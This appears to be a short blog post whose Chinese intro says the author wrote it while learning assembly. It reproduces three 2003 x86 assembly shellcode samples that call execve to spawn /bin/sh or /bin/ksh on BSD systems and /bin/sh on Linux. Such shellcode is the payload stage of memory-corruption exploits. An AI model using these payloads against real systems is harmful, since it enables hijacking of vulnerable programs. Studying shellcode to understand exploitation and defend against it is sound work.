Shellcode in Assembly
今天学汇编的时候学着写了几个Shellcode(运行/bin/sh)。
在BSD UNIX下运行的shellcode,执行/bin/sh
/*
* Shellcode: execve /bin/sh for BSD UNIX
* by matthew (matthew@arbornet.org)
* Apr 06 2003
*
* Tested on NetBSD1.6 FreeBSD4.7 OpenBSD3.2
*
* __@
* _ \<_
* (_)/(_) matthew@arbornet.org
*
*/
.global _start
_start:
jmp step1
step2:
popl %esi
xorl %eax, %eax
movb %al, 0x07(%esi)
movl %esi, 0x08(%esi)
pushl %eax
leal 0x08(%esi), %ebx
pushl %ebx
pushl %esi
pushl %eax
movb $0x3b, %al
int $0x80
step1:
call step2
.string "/bin/sh"在BSD UNIX下运行的shellcode,执行/bin/ksh
/*
* BSD shellcode
* execve /bin/ksh for NetBSD, FreeBSD, OpenBSD
* by matthew
*
* Apr 12 2003
*
* __@
* _ \<_
* (_)/(_) matthew@arbornet.org
*
*/
.global _start
_start:
xorl %eax, %eax
pushl %eax
pushl $0x68736b2f
pushl $0x6e69622f
movl %esp, %ebx
pushl %eax
pushl %ebx
movl %esp, %ecx
pushl %eax
pushl %ecx
pushl %ebx
pushl %eax
movb $0x3b, %al
int $0x80在Linux上运行的shellcode,执行/bin/sh
/*
* Shellcode for linux
* execve /bin/sh
* by matthew
* Apr 12 2003
*
* __@
* _ \<_
* (_)/(_) matthew@arbornet.org
*
*/
.global _start
_start:
xorl %eax, %eax
pushl %eax
pushl $0x68732f6e
pushl $0x69622f2f
movl %esp, %ebx
pushl %eax
pushl %ebx
movl %esp, %ecx
movl %eax, %edx
movb $0xb, %al
int $0x80